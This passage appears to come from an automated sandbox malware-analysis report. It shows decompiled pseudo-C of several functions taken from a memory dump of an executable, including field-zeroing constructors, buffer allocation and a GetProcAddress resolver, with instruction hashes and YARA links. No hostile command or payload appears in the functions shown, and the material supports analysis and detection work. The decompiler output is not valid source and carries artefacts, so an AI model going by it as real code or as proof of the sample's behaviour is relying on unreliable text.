                                                    • Instruction ID: db93f7dc26b58680f72aefad0ff2a1943e6d8ef8eb65cef43edc1a6dc1b94f1c
                                                    • Opcode Fuzzy Hash: 210a3948beb0032047df8deb4c587b6854df31f3bffd0854eaa7d74a52d346a2
                                                    • Instruction Fuzzy Hash: 8641D6719446589ADB24EBA0CC55FEAB7B8AF00304F0804EFE59A97193EB705FC9DB10
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CC13E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 89%
                                                    			E00CC13E1(intOrPtr __ecx, void* __edx, void* __edi, void* __eflags) {
				void* _t55;
				signed int _t61;
				char _t63;
				intOrPtr _t73;
				char _t82;
				void* _t87;
				intOrPtr _t89;
				void* _t91;
				void* _t96;

				_t96 = __eflags;
				_t87 = __edi;
				E00CDEB78(_t55, _t91);
				_push(__ecx);
				_push(__ecx);
				_t89 = __ecx;
				 *((intOrPtr*)(_t91 - 0x10)) = __ecx;
				E00CC9556(__ecx);
				 *((intOrPtr*)(__ecx)) = 0xcf35f8;
				 *((intOrPtr*)(_t91 - 4)) = 0;
				E00CC5E37(__ecx + 0x1038, _t96);
				 *((char*)(_t91 - 4)) = 1;
				E00CCCE40(__ecx + 0x20f8, __edx, _t96);
				 *((intOrPtr*)(__ecx + 0x21e8)) = 0;
				 *((intOrPtr*)(__ecx + 0x21ec)) = 0;
				E00CC157A();
				_t61 = E00CC157A();
				_t82 =  *((intOrPtr*)(_t91 + 8));
				 *((char*)(_t91 - 4)) = 4;
				 *((intOrPtr*)(__ecx + 0x21d4)) = 0;
				 *((char*)(__ecx + 0x21d0)) = _t61 & 0xffffff00 | _t82 == 0x00000000;
				_t98 = _t82;
				if(_t82 != 0) {
					_t63 = _t82;
				} else {
					_push(0x92f0);
					_t73 = E00CDEB38(__edx, _t98);
					 *((intOrPtr*)(_t91 - 0x14)) = _t73;
					 *((char*)(_t91 - 4)) = 5;
					if(_t73 == 0) {
						_t63 = 0;
					} else {
						_t63 = E00CCB505(_t73); // executed
					}
				}
				 *((intOrPtr*)(_t89 + 0x21d4)) = _t63;
				 *(_t89 + 0x21d8) =  *(_t89 + 0x21d8) | 0xffffffff;
				 *(_t89 + 0x21dc) =  *(_t89 + 0x21dc) | 0xffffffff;
				 *(_t89 + 0x21e0) =  *(_t89 + 0x21e0) | 0xffffffff;
				 *((char*)(_t89 + 0x30)) =  *((intOrPtr*)(_t63 + 0x71a1));
				 *((intOrPtr*)(_t89 + 0x6cc8)) = 2;
				 *((intOrPtr*)(_t89 + 0x6ccc)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cd0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cd8)) = 0;
				 *((intOrPtr*)(_t89 + 0x21e8)) = 0;
				 *((intOrPtr*)(_t89 + 0x21ec)) = 0;
				 *((char*)(_t89 + 0x6cd4)) = 0;
				 *((short*)(_t89 + 0x6cdc)) = 0;
				 *((intOrPtr*)(_t89 + 0x21f0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cb8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cbc)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cc0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cc4)) = 0;
				E00CDFFF0(_t87, _t89 + 0x2220, 0, 0x40);
				E00CDFFF0(_t87, _t89 + 0x2260, 0, 0x34);
				E00CDFFF0(_t87, _t89 + 0x45a8, 0, 0x20);
				 *((intOrPtr*)(_t89 + 0x6cf0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cfc)) = 0;
				 *((intOrPtr*)(_t89 + 0x6d00)) = 0;
				 *((intOrPtr*)(_t89 + 0x6d04)) = 0;
				 *((intOrPtr*)(_t89 + 0x6d08)) = 0;
				 *((intOrPtr*)(_t89 + 0x6d0c)) = 0;
				 *((short*)(_t89 + 0x6d12)) = 0;
				 *((char*)(_t89 + 0x6cee)) = 0;
				 *((char*)(_t89 + 0x6d10)) = 0;
				 *((char*)(_t89 + 0x21f8)) = 0;
				 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
				return _t89;
			}












                                                    0x00cc13e1
                                                    0x00cc13e1
                                                    0x00cc13e1
                                                    0x00cc13e6
                                                    0x00cc13e7
                                                    0x00cc13ea
                                                    0x00cc13ec
                                                    0x00cc13ef
                                                    0x00cc13f6
                                                    0x00cc1402
                                                    0x00cc1405
                                                    0x00cc1410
                                                    0x00cc1414
                                                    0x00cc141f
                                                    0x00cc1425
                                                    0x00cc142b
                                                    0x00cc1436
                                                    0x00cc143b
                                                    0x00cc1440
                                                    0x00cc1447
                                                    0x00cc144d
                                                    0x00cc1453
                                                    0x00cc1455
                                                    0x00cc147a
                                                    0x00cc1457
                                                    0x00cc1457
                                                    0x00cc145c
                                                    0x00cc1462
                                                    0x00cc1465
                                                    0x00cc146b
                                                    0x00cc1476
                                                    0x00cc146d
                                                    0x00cc146f
                                                    0x00cc146f
                                                    0x00cc146b
                                                    0x00cc147c
                                                    0x00cc1488
                                                    0x00cc148f
                                                    0x00cc1496
                                                    0x00cc149f
                                                    0x00cc14aa
                                                    0x00cc14b4
                                                    0x00cc14ba
                                                    0x00cc14c0
                                                    0x00cc14c6
                                                    0x00cc14cc
                                                    0x00cc14d2
                                                    0x00cc14d8
                                                    0x00cc14df
                                                    0x00cc14e5
                                                    0x00cc14eb
                                                    0x00cc14f1
                                                    0x00cc14f7
                                                    0x00cc14fd
                                                    0x00cc150c
                                                    0x00cc151b
                                                    0x00cc1526
                                                    0x00cc152e
                                                    0x00cc1534
                                                    0x00cc153a
                                                    0x00cc1540
                                                    0x00cc1546
                                                    0x00cc154c
                                                    0x00cc1552
                                                    0x00cc155b
                                                    0x00cc1561
                                                    0x00cc1567
                                                    0x00cc156f
                                                    0x00cc1577

                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00CC13E1
                                                      • Part of subcall function 00CC5E37: __EH_prolog.LIBCMT ref: 00CC5E3C
                                                      • Part of subcall function 00CCCE40: __EH_prolog.LIBCMT ref: 00CCCE45
                                                      • Part of subcall function 00CCB505: __EH_prolog.LIBCMT ref: 00CCB50A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: H_prolog
                                                    • String ID:
                                                    • API String ID: 3519838083-0
                                                    • Opcode ID: 7f95fa38065cb24d95740098f8bda9934368ae125d5814a097c1d6f6f98e737d
                                                    • Instruction ID: 20359fd918b34cc8f1ba067d66b3f68215b4e5623472c3c2e672620de31e77f4
                                                    • Opcode Fuzzy Hash: 7f95fa38065cb24d95740098f8bda9934368ae125d5814a097c1d6f6f98e737d
                                                    • Instruction Fuzzy Hash: F24156B0905B409EE724DF7AC885AE6FAE5BF19300F54492EE5FF83282CB316654DB10
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CC13DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 89%
                                                    			E00CC13DC(intOrPtr __ecx, void* __edi, void* __eflags) {
				signed int _t61;
				char _t63;
				intOrPtr _t73;
				char _t82;
				void* _t86;
				void* _t87;
				intOrPtr _t89;
				void* _t91;
				void* _t96;

				_t96 = __eflags;
				_t87 = __edi;
				E00CDEB78(0xcf2635, _t91);
				_push(__ecx);
				_push(__ecx);
				_t89 = __ecx;
				 *((intOrPtr*)(_t91 - 0x10)) = __ecx;
				E00CC9556(__ecx);
				 *((intOrPtr*)(__ecx)) = 0xcf35f8;
				 *((intOrPtr*)(_t91 - 4)) = 0;
				E00CC5E37(__ecx + 0x1038, _t96);
				 *((char*)(_t91 - 4)) = 1;
				E00CCCE40(__ecx + 0x20f8, _t86, _t96);
				 *((intOrPtr*)(__ecx + 0x21e8)) = 0;
				 *((intOrPtr*)(__ecx + 0x21ec)) = 0;
				E00CC157A();
				_t61 = E00CC157A();
				_t82 =  *((intOrPtr*)(_t91 + 8));
				 *((char*)(_t91 - 4)) = 4;
				 *((intOrPtr*)(__ecx + 0x21d4)) = 0;
				 *((char*)(__ecx + 0x21d0)) = _t61 & 0xffffff00 | _t82 == 0x00000000;
				_t98 = _t82;
				if(_t82 != 0) {
					_t63 = _t82;
				} else {
					_push(0x92f0);
					_t73 = E00CDEB38(_t86, _t98);
					 *((intOrPtr*)(_t91 - 0x14)) = _t73;
					 *((char*)(_t91 - 4)) = 5;
					if(_t73 == 0) {
						_t63 = 0;
					} else {
						_t63 = E00CCB505(_t73); // executed
					}
				}
				 *((intOrPtr*)(_t89 + 0x21d4)) = _t63;
				 *(_t89 + 0x21d8) =  *(_t89 + 0x21d8) | 0xffffffff;
				 *(_t89 + 0x21dc) =  *(_t89 + 0x21dc) | 0xffffffff;
				 *(_t89 + 0x21e0) =  *(_t89 + 0x21e0) | 0xffffffff;
				 *((char*)(_t89 + 0x30)) =  *((intOrPtr*)(_t63 + 0x71a1));
				 *((intOrPtr*)(_t89 + 0x6cc8)) = 2;
				 *((intOrPtr*)(_t89 + 0x6ccc)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cd0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cd8)) = 0;
				 *((intOrPtr*)(_t89 + 0x21e8)) = 0;
				 *((intOrPtr*)(_t89 + 0x21ec)) = 0;
				 *((char*)(_t89 + 0x6cd4)) = 0;
				 *((short*)(_t89 + 0x6cdc)) = 0;
				 *((intOrPtr*)(_t89 + 0x21f0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cb8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cbc)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cc0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cc4)) = 0;
				E00CDFFF0(_t87, _t89 + 0x2220, 0, 0x40);
				E00CDFFF0(_t87, _t89 + 0x2260, 0, 0x34);
				E00CDFFF0(_t87, _t89 + 0x45a8, 0, 0x20);
				 *((intOrPtr*)(_t89 + 0x6cf0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cfc)) = 0;
				 *((intOrPtr*)(_t89 + 0x6d00)) = 0;
				 *((intOrPtr*)(_t89 + 0x6d04)) = 0;
				 *((intOrPtr*)(_t89 + 0x6d08)) = 0;
				 *((intOrPtr*)(_t89 + 0x6d0c)) = 0;
				 *((short*)(_t89 + 0x6d12)) = 0;
				 *((char*)(_t89 + 0x6cee)) = 0;
				 *((char*)(_t89 + 0x6d10)) = 0;
				 *((char*)(_t89 + 0x21f8)) = 0;
				 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
				return _t89;
			}












                                                    0x00cc13dc
                                                    0x00cc13dc
                                                    0x00cc13e1
                                                    0x00cc13e6
                                                    0x00cc13e7
                                                    0x00cc13ea
                                                    0x00cc13ec
                                                    0x00cc13ef
                                                    0x00cc13f6
                                                    0x00cc1402
                                                    0x00cc1405
                                                    0x00cc1410
                                                    0x00cc1414
                                                    0x00cc141f
                                                    0x00cc1425
                                                    0x00cc142b
                                                    0x00cc1436
                                                    0x00cc143b
                                                    0x00cc1440
                                                    0x00cc1447
                                                    0x00cc144d
                                                    0x00cc1453
                                                    0x00cc1455
                                                    0x00cc147a
                                                    0x00cc1457
                                                    0x00cc1457
                                                    0x00cc145c
                                                    0x00cc1462
                                                    0x00cc1465
                                                    0x00cc146b
                                                    0x00cc1476
                                                    0x00cc146d
                                                    0x00cc146f
                                                    0x00cc146f
                                                    0x00cc146b
                                                    0x00cc147c
                                                    0x00cc1488
                                                    0x00cc148f
                                                    0x00cc1496
                                                    0x00cc149f
                                                    0x00cc14aa
                                                    0x00cc14b4
                                                    0x00cc14ba
                                                    0x00cc14c0
                                                    0x00cc14c6
                                                    0x00cc14cc
                                                    0x00cc14d2
                                                    0x00cc14d8
                                                    0x00cc14df
                                                    0x00cc14e5
                                                    0x00cc14eb
                                                    0x00cc14f1
                                                    0x00cc14f7
                                                    0x00cc14fd
                                                    0x00cc150c
                                                    0x00cc151b
                                                    0x00cc1526
                                                    0x00cc152e
                                                    0x00cc1534
                                                    0x00cc153a
                                                    0x00cc1540
                                                    0x00cc1546
                                                    0x00cc154c
                                                    0x00cc1552
                                                    0x00cc155b
                                                    0x00cc1561
                                                    0x00cc1567
                                                    0x00cc156f
                                                    0x00cc1577

                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00CC13E1
                                                      • Part of subcall function 00CC5E37: __EH_prolog.LIBCMT ref: 00CC5E3C
                                                      • Part of subcall function 00CCCE40: __EH_prolog.LIBCMT ref: 00CCCE45
                                                      • Part of subcall function 00CCB505: __EH_prolog.LIBCMT ref: 00CCB50A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: H_prolog
                                                    • String ID:
                                                    • API String ID: 3519838083-0
                                                    • Opcode ID: 67e73c95c534c8f75275de8ba4fa70ece157908bc1318c8caeb20d02f71685f7
                                                    • Instruction ID: ff2cb6316c78afa5243397c92b78ac1b1d71fce698e3cc7bb6e1349ed2df0e36
                                                    • Opcode Fuzzy Hash: 67e73c95c534c8f75275de8ba4fa70ece157908bc1318c8caeb20d02f71685f7
                                                    • Instruction Fuzzy Hash: 934136B0905B409AE724DF7A8885AE6FAE5BF19300F54492ED6FE83282CB316654DB11
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CD359E Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 71%
                                                    			E00CD359E(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t29;
				signed int* _t36;
				signed int _t38;
				intOrPtr _t39;
				intOrPtr _t42;
				signed int _t44;
				void* _t47;
				void* _t60;
				signed int _t65;
				void* _t67;
				void* _t69;
				void* _t73;

				_t29 = E00CDEB78(0xcf2a92, _t67);
				_push(__ecx);
				_push(__ecx);
				_t60 = __ecx;
				_t44 = 0;
				_t72 =  *((intOrPtr*)(__ecx + 0x20));
				if( *((intOrPtr*)(__ecx + 0x20)) == 0) {
					_push(0x400400); // executed
					_t42 = E00CDEE53(__ecx, __edx, _t72); // executed
					 *((intOrPtr*)(__ecx + 0x20)) = _t42;
					_t29 = E00CDFFF0(__ecx, _t42, 0, 0x400400);
					_t69 = _t69 + 0x10;
				}
				_t73 =  *(_t60 + 0x18) - _t44;
				if(_t73 == 0) {
					_t65 =  *((intOrPtr*)(_t60 + 0x1c)) +  *((intOrPtr*)(_t60 + 0x1c));
					_t30 = _t65;
					 *(_t67 - 0x10) = _t65;
					_push( ~(0 | _t73 > 0x00000000) | ( ~(_t73 > 0) | _t65 * 0x00004ae4) + 0x00000004);
					_t36 = E00CDEE53(( ~(_t73 > 0) | _t65 * 0x00004ae4) + 4, _t30 * 0x4ae4 >> 0x20, _t73);
					_pop(0xd01098);
					 *(_t67 - 0x14) = _t36;
					 *(_t67 - 4) = _t44;
					_t74 = _t36;
					if(_t36 != 0) {
						_push(E00CD2360);
						_push(E00CD21C0);
						_push(_t65);
						_t16 =  &(_t36[1]); // 0x4
						_t44 = _t16;
						 *_t36 = _t65;
						_push(0x4ae4);
						_push(_t44);
						E00CDEC7B(_t44, _t60, _t65, _t74);
					}
					 *(_t67 - 4) =  *(_t67 - 4) | 0xffffffff;
					 *(_t60 + 0x18) = _t44;
					_t29 = E00CDFFF0(_t60, _t44, 0, _t65 * 0x4ae4);
					if(_t65 != 0) {
						_t38 = 0;
						 *(_t67 - 0x10) = 0;
						do {
							_t47 =  *(_t60 + 0x18) + _t38;
							if( *((intOrPtr*)(_t47 + 0x4ad4)) == 0) {
								 *((intOrPtr*)(_t47 + 0x4adc)) = 0x4100;
								_t39 = E00CE3E33(0xd01098); // executed
								 *((intOrPtr*)(_t47 + 0x4ad4)) = _t39;
								0xd01098 = 0x30c00;
								if(_t39 == 0) {
									E00CC6CA7(0xd01098);
								}
								_t38 =  *(_t67 - 0x10);
							}
							_t38 = _t38 + 0x4ae4;
							 *(_t67 - 0x10) = _t38;
							_t65 = _t65 - 1;
						} while (_t65 != 0);
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t67 - 0xc));
				return _t29;
			}


















                                                    0x00cd35a3
                                                    0x00cd35a8
                                                    0x00cd35a9
                                                    0x00cd35ad
                                                    0x00cd35af
                                                    0x00cd35b1
                                                    0x00cd35b4
                                                    0x00cd35bb
                                                    0x00cd35bc
                                                    0x00cd35c4
                                                    0x00cd35c7
                                                    0x00cd35cc
                                                    0x00cd35cc
                                                    0x00cd35cf
                                                    0x00cd35d2
                                                    0x00cd35dd
                                                    0x00cd35e4
                                                    0x00cd35e6
                                                    0x00cd35fe
                                                    0x00cd35ff
                                                    0x00cd3604
                                                    0x00cd3605
                                                    0x00cd3608
                                                    0x00cd360b
                                                    0x00cd360d
                                                    0x00cd360f
                                                    0x00cd3614
                                                    0x00cd3619
                                                    0x00cd361a
                                                    0x00cd361a
                                                    0x00cd361d
                                                    0x00cd361f
                                                    0x00cd3624
                                                    0x00cd3625
                                                    0x00cd3625
                                                    0x00cd362a
                                                    0x00cd3634
                                                    0x00cd363b
                                                    0x00cd3645
                                                    0x00cd3647
                                                    0x00cd3649
                                                    0x00cd364c
                                                    0x00cd364f
                                                    0x00cd3658
                                                    0x00cd365f
                                                    0x00cd3669
                                                    0x00cd366e
                                                    0x00cd3674
                                                    0x00cd3677
                                                    0x00cd367e
                                                    0x00cd367e
                                                    0x00cd3683
                                                    0x00cd3683
                                                    0x00cd3686
                                                    0x00cd368b
                                                    0x00cd368e
                                                    0x00cd368e
                                                    0x00cd364c
                                                    0x00cd3645
                                                    0x00cd3699
                                                    0x00cd36a1

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: H_prolog
                                                    • String ID:
                                                    • API String ID: 3519838083-0
                                                    • Opcode ID: d857d6d37500158e0cd92d406c2b55ca4b181a8fc997971187ca97be419e0a77
                                                    • Instruction ID: 40b15dafa9dfb0a7300385588ef09e1c88b9685b98bf7feccbe67a5916628793
                                                    • Opcode Fuzzy Hash: d857d6d37500158e0cd92d406c2b55ca4b181a8fc997971187ca97be419e0a77
                                                    • Instruction Fuzzy Hash: D321E1B5E40251ABDB14AF75CC41A6BB7A8FB19714F04053FF716AB781D3B09A00C6A9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDB093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 83%
                                                    			E00CDB093(void* __ecx, void* __edx, void* __eflags) {
				void* __edi;
				void* __esi;
				char _t39;
				char _t41;
				char _t60;
				char _t65;
				signed int _t70;
				void* _t72;
				intOrPtr _t74;
				void* _t77;

				_t77 = __eflags;
				E00CDEB78(0xcf2ae8, _t72);
				_push(__ecx);
				E00CDEC50(0x7d2c);
				_push(_t70);
				_push(_t68);
				 *((intOrPtr*)(_t72 - 0x10)) = _t74;
				 *((intOrPtr*)(_t72 - 4)) = 0;
				E00CC13DC(_t72 - 0x7d3c, _t68, _t77, 0); // executed
				 *((char*)(_t72 - 4)) = 1;
				E00CC1FDC(_t72 - 0x7d3c, __edx, _t70, _t72, _t77,  *((intOrPtr*)(_t72 + 0xc)));
				if( *((intOrPtr*)(_t72 - 0x105f)) == 0) {
					 *((intOrPtr*)(_t72 - 0x24)) = 0;
					 *(_t72 - 0x20) = 0;
					 *((intOrPtr*)(_t72 - 0x1c)) = 0;
					 *((intOrPtr*)(_t72 - 0x18)) = 0;
					 *((char*)(_t72 - 0x14)) = 0;
					 *((char*)(_t72 - 4)) = 2;
					_push(_t72 - 0x24);
					_t59 = _t72 - 0x7d3c;
					_t39 = E00CC19AF(_t72 - 0x7d3c, __edx);
					__eflags = _t39;
					if(_t39 != 0) {
						_t70 =  *(_t72 - 0x20);
						_t68 = _t70 + _t70;
						_push(_t70 + _t70 + 2);
						_t65 = E00CE3E33(_t59);
						 *((intOrPtr*)( *((intOrPtr*)(_t72 + 0x10)))) = _t65;
						__eflags = _t65;
						if(_t65 != 0) {
							__eflags = 0;
							 *((short*)(_t65 + _t70 * 2)) = 0;
							E00CE0320(_t65,  *((intOrPtr*)(_t72 - 0x24)), _t68);
						} else {
							_t70 = 0;
						}
						 *( *(_t72 + 0x14)) = _t70;
					}
					_t60 =  *((intOrPtr*)(_t72 - 0x24));
					 *((char*)(_t72 - 4)) = 3;
					__eflags = _t60;
					if(_t60 != 0) {
						__eflags =  *((char*)(_t72 - 0x14));
						if( *((char*)(_t72 - 0x14)) != 0) {
							__eflags =  *((intOrPtr*)(_t72 - 0x1c)) +  *((intOrPtr*)(_t72 - 0x1c));
							E00CCF445(_t60,  *((intOrPtr*)(_t72 - 0x1c)) +  *((intOrPtr*)(_t72 - 0x1c)));
							_t60 =  *((intOrPtr*)(_t72 - 0x24));
						}
						L00CE3E2E(_t60);
					}
					E00CC1692(_t72 - 0x7d3c, _t68, _t70); // executed
					_t41 = 1;
				} else {
					E00CC1692(_t72 - 0x7d3c, _t68, _t70);
					_t41 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t72 - 0xc));
				return _t41;
			}













                                                    0x00cdb093
                                                    0x00cdb098
                                                    0x00cdb09d
                                                    0x00cdb0a3
                                                    0x00cdb0a9
                                                    0x00cdb0aa
                                                    0x00cdb0ad
                                                    0x00cdb0b7
                                                    0x00cdb0ba
                                                    0x00cdb0c8
                                                    0x00cdb0cc
                                                    0x00cdb0d7
                                                    0x00cdb0eb
                                                    0x00cdb0ee
                                                    0x00cdb0f1
                                                    0x00cdb0f4
                                                    0x00cdb0f7
                                                    0x00cdb0fd
                                                    0x00cdb101
                                                    0x00cdb102
                                                    0x00cdb108
                                                    0x00cdb10d
                                                    0x00cdb10f
                                                    0x00cdb111
                                                    0x00cdb114
                                                    0x00cdb11a
                                                    0x00cdb121
                                                    0x00cdb126
                                                    0x00cdb128
                                                    0x00cdb12a
                                                    0x00cdb130
                                                    0x00cdb133
                                                    0x00cdb13b
                                                    0x00cdb12c
                                                    0x00cdb12c
                                                    0x00cdb12c
                                                    0x00cdb146
                                                    0x00cdb146
                                                    0x00cdb148
                                                    0x00cdb14b
                                                    0x00cdb14f
                                                    0x00cdb151
                                                    0x00cdb153
                                                    0x00cdb157
                                                    0x00cdb15c
                                                    0x00cdb160
                                                    0x00cdb165
                                                    0x00cdb165
                                                    0x00cdb169
                                                    0x00cdb16e
                                                    0x00cdb175
                                                    0x00cdb17a
                                                    0x00cdb0d9
                                                    0x00cdb0df
                                                    0x00cdb0e4
                                                    0x00cdb0e4
                                                    0x00cdb181
                                                    0x00cdb18a

                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00CDB098
                                                      • Part of subcall function 00CC13DC: __EH_prolog.LIBCMT ref: 00CC13E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: H_prolog
                                                    • String ID:
                                                    • API String ID: 3519838083-0
                                                    • Opcode ID: 0ef9af323c62dfdf9b1c5bb8413c8c88db05bef3ee2a574a45feed9ac2af5a54
                                                    • Instruction ID: 2ca2c5d52b57cf19085acfd6246cc057251f35ddba1e1eb703ce2348f369487b
                                                    • Opcode Fuzzy Hash: 0ef9af323c62dfdf9b1c5bb8413c8c88db05bef3ee2a574a45feed9ac2af5a54
                                                    • Instruction Fuzzy Hash: C8316A75810249EACF15EFA6C851AEEBBB4AF09304F14449EE809B7242D735AF04DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CEAC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    C-Code - Quality: 90%
                                                    			E00CEAC98(signed int _a4, CHAR* _a8, intOrPtr* _a12, intOrPtr _a16) {
				struct HINSTANCE__* _t13;
				signed int* _t20;
				signed int _t27;
				signed int _t28;
				signed int _t29;
				signed int _t33;
				intOrPtr* _t34;

				_t20 = 0xd22628 + _a4 * 4;
				_t27 =  *0xcfe7ac; // 0x349e4b74
				_t29 = _t28 | 0xffffffff;
				_t33 = _t27 ^  *_t20;
				asm("ror esi, cl");
				if(_t33 == _t29) {
					L14:
					return 0;
				}
				if(_t33 == 0) {
					_t34 = _a12;
					if(_t34 == _a16) {
						L7:
						_t13 = 0;
						L8:
						if(_t13 == 0) {
							L13:
							_push(0x20);
							asm("ror edi, cl");
							 *_t20 = _t29 ^ _t27;
							goto L14;
						}
						_t33 = GetProcAddress(_t13, _a8);
						if(_t33 == 0) {
							_t27 =  *0xcfe7ac; // 0x349e4b74
							goto L13;
						}
						 *_t20 = E00CE7CA3(_t33);
						goto L2;
					} else {
						goto L4;
					}
					while(1) {
						L4:
						_t13 = E00CEAD34( *_t34); // executed
						if(_t13 != 0) {
							break;
						}
						_t34 = _t34 + 4;
						if(_t34 != _a16) {
							continue;
						}
						_t27 =  *0xcfe7ac; // 0x349e4b74
						goto L7;
					}
					_t27 =  *0xcfe7ac; // 0x349e4b74
					goto L8;
				}
				L2:
				return _t33;
			}










                                                    0x00ceaca3
                                                    0x00ceacac
                                                    0x00ceacb2
                                                    0x00ceacbc
                                                    0x00ceacbe
                                                    0x00ceacc2
                                                    0x00cead2d
                                                    0x00000000
                                                    0x00cead2d
                                                    0x00ceacc6
                                                    0x00ceaccc
                                                    0x00ceacd2
                                                    0x00ceacee
                                                    0x00ceacee
                                                    0x00ceacf0
                                                    0x00ceacf2
                                                    0x00cead1d
                                                    0x00cead1f
                                                    0x00cead27
                                                    0x00cead2b
                                                    0x00000000
                                                    0x00cead2b
                                                    0x00ceacfe
                                                    0x00cead02
                                                    0x00cead17
                                                    0x00000000
                                                    0x00cead17
                                                    0x00cead0b
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ceacd4
                                                    0x00ceacd4
                                                    0x00ceacd6
                                                    0x00ceacde
                                                    0x00000000
                                                    0x00000000
                                                    0x00ceace0
                                                    0x00ceace6
                                                    0x00000000
                                                    0x00000000
